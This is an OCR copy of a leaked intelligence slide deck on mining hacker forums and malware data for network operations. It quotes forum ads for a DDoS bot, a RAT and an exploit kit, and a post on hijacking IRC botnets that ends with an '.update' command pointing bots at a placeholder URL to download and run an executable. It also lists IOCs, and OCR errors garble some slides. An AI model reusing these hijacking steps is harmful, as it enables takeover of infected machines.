Title: OSINT Fusion Project

Release Date: 2015-07-01

Description: This undated presentation from NSA’s UK-based Menwith Hill station describes the various uses of open source intelligence (OSINT) in computer network operations, including the monitoring of hacker forums and spotting opportunities for so-called “Fourth Party Collection”: see the Intercept article XKEYSCORE: NSA’s Google for the World’s Private Communications, 1 July 2015.

Document: TOP SECRET//COMINT//REL TO USA, FVEY

OSINT FUSION PROJECT

Lockheed Martin IS&GS Intelligence

LOCKHEED MARTIN

TOP SECRET//COMINT//REL TO USA, FVEY



TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



Traditional OSINT

• Traditional OSINT is mostly from main
stream news, compiled summaries, and
information put out by venders.

- Good for situational awareness

- Some excellent analysis on attacks and
exploits

- Information can be days or weeks old

- Doesn’t normally contain strong selectors

Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



Research Objectives

• To compile OSINT information that
enables CNO operations & analysis

- Emerging threats

- Situational awareness

- Identification of the following:

• Victims • Capabilities

• Adversaries • Infrastructure


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H i K D ¡A A F



Research Objectives

• To identify strong selectors and unique
strings from OSINT that can be used
within SIGINT:

-To build XKEYSCORE Fingerprints to identify
the an adversaries capabilities being used
within SIGINT Collection

- To identify and task adversaries and their
infrastructure within SIGINT

-To identify victims for 4th Party Collection
Opportunities


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

Hacker Forums

1 D C K H i 'S D MARTIN

• A clever way to collect OSINT information
from Hacker Forums

- RSS Feeds

• Automated collection of new and historical posts

• Allows quicker analysis of posts

• Leaves no tracks on the forum unlike AIRGAP

• If enabled, can also get feeds from closed (login
required) forums.

• Enables analyst to prioritize other sites without

RSS feeds for other access operations


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY .........

Hacker Forums

• Allows for the identification of:

- Adversaries

• Those who are building capabilities

• Those who are selling capabilities

• Those who are using the capabilities

• Those who are selling information (Cyber Crime)

- Capabilities

• Profiling and understanding of emerging tactics, techniques,
and procedures used by our adversaries

• Identification of locations where capabilities can be obtained


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

Hacker Forums

BalckEnergy DDoS Bot

by kmv9Q0

nuclear stealth mechanisms fludery support multitargeting and multirezolving - if the purpose for the attack indicates
the domain name is created by a group of flows to attack each IP-address attached to this domain (rezolving
repeated every 15 minutes)

1 D C K H i 'S D A4 A ft r t M

[RAT] Slayer61 S's RAT 1.2 Final

by slayeroi 6
Hey Guys,

i completed the first Final Build. After some hard work i fixed like 20 lillle Bugs and added Keylogging Function +• Bettor GUI
-+■ Flag System!

ScreenShct:

.V WVW\l'i,i mmV WVi*.1 ' W V* *»•» 'fc

E3- SlayerG16*s Reverse Administrator' - Listening on Port: 1234 '

... 1 V.V * *. .•A1.1« . .* \\W.’. .V.V. . . .* ‘ '

mmm

'■\r

Bundles exploit [yes Exploit SystemJ

by Saint

Welcome forumchan!

Sell sploitov ligament.

Test mix, ¡frame traffic:

Your browser version orob va Percent
inte-net Explorer 5.0 - 50-75%
riternet Explorer 5.1 - 50-75%
nte-net Explorer 5.5 - 80-90%
Internet Explorer 6.0 - 35-59%
Internet Explorer 7.0 - 10-15%
nte'net Explorer 6 0 - 5-10%
Opera 9.0-9.25 - 75 80%

Opera 9.5x-9.6x -10-15%
Opera 10.0 -8-10%

F leFux 1 .X - 15-20%

F reFox 2.X - 10-15%
f ¡reí ox 3.X- 10%

,Vo?il a 5.x - 5-8%

Create a Zip Bomb - Zip of Death

Posted by X.E.R.O

A zip bomb, also known as a Zip of Death, is a malicious archive file designed to crash or
render useless the program or system reading it. It is often used by virus writers to
disable antivirus software, so that a more traditional virus sent afterwards could get into
system undetected. A zip bomb is usually a small file (up to a few hundred kilobytes) for
ease of transport and to avoid suspicion. However, when the file is unpacked its contents
are more than the system can handle. You can make your own zip bomb to annoy your
friends or just out of curiosity (or wilderness) to experiment with it. Make sure you don't
detonate it on yourself.


TOP SECRET//COMINT//REL TO USA, FVEY

J

TOP SECRET//COMINT//REL TO USA, FVEY

Hacker Forums

O The following Host Name was requested from a host database;

► m, DRD3H.COM

was

rnote Host Port Nu

rn.DRD3H.COM 6668

0 There

attempt to establish co

m*® Outbound traffic (potentially malicious)

* f

G Attention! There was a new co

:Cfob-36570.5344
ussmssr Cbb-o¿s?os34-i

__

• XU clc dcj.ia.;- s

irere*sr yourserver.
/server Iwiiats

herel in your IRC
client

Make your nick similar

nnection details .

ed outbo

USER cunxdaotrxay 0 O : Cbh~
U5KFJH0ST Cbb-526873443

theres me channel and

y Heuristics Analysis n|j

TOP SECRET//COMINT//REL TO USA, FVEY

J

TOP SECRET//COMINT//REL TO USA, FVEY

Hacker Forums

1 D C K H i 'S D MARTIN

You need 10 be operator to set the topic. Default password is /oper foo bar; blit if they have changed it, DDoS attack it with your bots
and make sure that you are the first to join!

if you happen to get into a channel with a ton of bots, and the op isnt there, change your nick to a bot's name, or similar, and wait.
They should type like .login
thats when you do the same! haha.
type .login

then .update http://www.somehost.CQni/YOurfilc.cxe



TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

Malicious Emails

1 D C K H i * D MARTIN

• Leverage OSINT to identify the
infrastructure and source of top virus email
senders by IP address

- Based on CISCO IronPort view of 25-30% of
the worlds email

- Identifies infrastructure used by adversaries to

deliver capability

-Allows SIGINT profiling of activity on the IP

Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

Malicious Emails

1 D C K H i 'S D MARTIN

Tcp IOC virus genders by ip address for the last day 10 MAY 20C9
I? Address Hostname FWÖ / Rev DNS Volume vol change vs. Avg Network Owner
216.34.181.68 mx.sourceforge.net Y 0.241929 -24.1762 SAWIS Communications Corporation
217.67.228.225 hosted.by.dwsmedia.net 0.14969 490.542 Standby Power B.V. range
210.210.14S.51 mx-corp3-out.cbn.net.id Y 0.040585 -60.33 PT Cyberindo Aditama
59.95.152.42 0.0212589 -28.3654 NIB (National Internet Backbone)
59.7.203.227 mail.allisports.com M 0.0159881 259.837 AST Dew Tour
75.19.187.14 adsl-75-19-187 -14.dsl.bltnin.sbcglobal.net 0.0158124 430.639 STEELE BEARD ELECTRIC CO
56.191.129.7 sparachkmxll.k-opti.com Y 0.0130013 -54.3573 K-opticom corporation
125.189.230.12C 0.0115957 735.999 156.623 P0W2RC0MK PouncHost Internet Services
92.48.118.137 victorious.eukhost.com 0.0105416
203.188.255.3 dhaka.bangla.ne t Y 0. C101902 -11.9755 Information Services Network
196.211.9.26 0.00773049 22.2103 Internet Solutions
60.25C.154.181 Y 0.00667633 -86.6825 CHTD, Chunghwa Telecom Co., Ltd.
194.228.41.114 relsy.iol.es Y 0.00650064 -63.7897 Czech Telecom a.c.
121.189.63.190 0.00614925 -9.34094 Korea Telecom
71.34.227.194 mail.vesd.net 0.00527079 166 CHARTER COMMUNICATIONS
37.118.148.35 sh-148-035.eg.del.bg 0.0050951 961.184 Davidov Met PI space

|HU
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



Malicious Connections

• An effort to identify the latest emerging
threats that are not yet detected by anti-
virus or IDS/IPS signatures

- Malicious Binary MD5 (track capability)

-The adversaries infrastructure that exploited
systems connect to after being compromised

-Traffic generated by compromised systems to
build XKEYSCORE fingerprints

Bp —9
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

LOCKHEED MARTIN

Malicious Connections

18 MAY 2009

Tile following "call home" IPs/Domains should. he considered
Enalicious and connectivity to them should be investigated.
Systems initiating a. connection with, these IPs/Domains
should Ibe t are a ted as compromised until tj
reviewed. POC:



File ME) 5 : OxAlBFF64FE8CB692A8F1F1DDFE7 6510 7F

File SIIA-X: OxlDEC6Bl 8SD45 6EBB3F6 2 9E5C2 4 4 0C10BF2 8DC6 9 0

Filesize: 108,032 bytes

Category : A malicious trojan horse or hot that, may

represent security risk for the compromised system and/or
its network environment

Tine following Host Name was requested from a host database:
- hf . bux'imche . net

Tirera was registered attempt to establish connection with
tire remote host . The connection details acre :

Remote Host Port Number

hf . burimche . not 4244

There was a new connection established with, a remote IRC
Server . The generated outbound IRC traffic is provi de.d
belowt

PASS bf NICK [00[USA|030685] UStiR XP — 0 4 4 2 * O : COMPUTERMAMR

TOP SECRET//C0MINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



Malicious Connections

• NTOC - Signatures for Sensors

- BLUESASH

- TUTELAGE (TURBULENCE Defensive)

- CROSSBONES

• NSATAO/GCHQCNE-Counter CNE Ops

• MHS / NDIST - 4th Party Collection

• JCMA Cyber - Customer focused CND

• GOVCERT UK-UK Government CND


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY ......... ...ïttt#

Malicious Connections

• (U//FOUO) The following statistics show the number of NTOC DNS
Alerts that were an exact match for a malicious connection reported in
the MHSCNO Malicious Connections Report.

• Date Total DNS Alerts Exact MCR Match Percentage

• 5/14/09 22 13 59%
• 5/13/09 23 11 47%
• 5/12/09 23 10 43%
• 5/11 /09 21 11 52%
• 5/10/09 51 44 86%
• 5/09/09 12 8 67%
• 5/08/09 52 44 85%
• 5/07/09 84 75 89%
• 5/06/09 20 14 70%
• 5/04/09 107 66 62%
• 5/03/09 1 1 100%
• 5/01 /09 77 74 96%
• 4/30/09 82 71 87%
• 4/29/09 80 73 91%
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



Malicious Connections

• US/UK/AU Government Email addresses
passed to exploit server - 17 email accounts

- Discovered using an MHS developed XKEYSCORE
Fingerprint that was written to identify a malicious
connection while searching for MENA 4th Party
Collection opportunities.

h
TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



ShadowServer Data

• Sinkhole HTTP Drone Report - All the IP

addresses that joined the sinkhole server that did
not join via a referral URL. Since the Sinkhole server
is only accessed through previously malicious
domain names only infected systems are in the
report.

- Victims / Infrastructure / HTTP Command Strings


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



ShadowServer Data

* Sandbox URL Report - These are URLs that were
access by malware.

- Binary MD5 Hashes / Infrastructure / HTTP Command
Strings

* Botnet Drone Report - All the IP addresses that

were seen joining a known Botnet Command and
Control Server.

- Victims / Infrastructure

• 25 US Government (Federal / State / Local) systems
communicating with botnets between 5-7 June 2009


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

1 O C K H * K D MAP



ShadowServer Data

* Botnet URL Report - Any URL that was seen in a
botnet channel is reported. The URL could be an
update, complaint, or information related to the
criminals. Everything is included in case there is

something of value in the URL.

- Infrastructure / Capabilities / HTTP Command Strings

• DDoS Report - Any DDoS attack is reported
whether the country is the target or the source of the
attack.

- Victims / Infrastructure / Capabilities


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

State Sponsored

1 D C K H i 'S D MARTIN

• Example 1 (FBI CN Intrusion Set)

- Identified MALWARE report for known
domain.

- Found another binary which was an exact
match that revealed a previously
unassociated domain to this intrusion set 9
months before first known activity of this
intrusion set.

• Infrastructure / Registration / Timeline / MD5 hash


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

State Sponsored

1 D C K H i * D MARTIN

• Example 2 (JTF-GNO CN Intrusion Set)

- 6 different reports noted the use of a specific
Chinese developed standalone web server
software package.

- Identified 3 new binaries in OSINT malware
research that also used this exact software
package.

• 3 new domains (infrastructure / registration / time
line / MD5 Hashes)


TOP SECRET//COMINT//REL TO USA, FVEY

TOP SECRET//COMINT//REL TO USA, FVEY

State Sponsored

1 D C K H i * D MARTIN

• Example 3 (NSA CN Intrusion Set)

- Identified 2 binaries in OSINT that matched
those called out in a report with their
associated malware analysis and MD5
hashes.

h
TOP SECRET//COMINT//REL TO USA, FVEY

J

TOP SECRET//COMINT//REL TO USA, FVEY

lOCKHSWD !A A R 7 l Si '

Questions?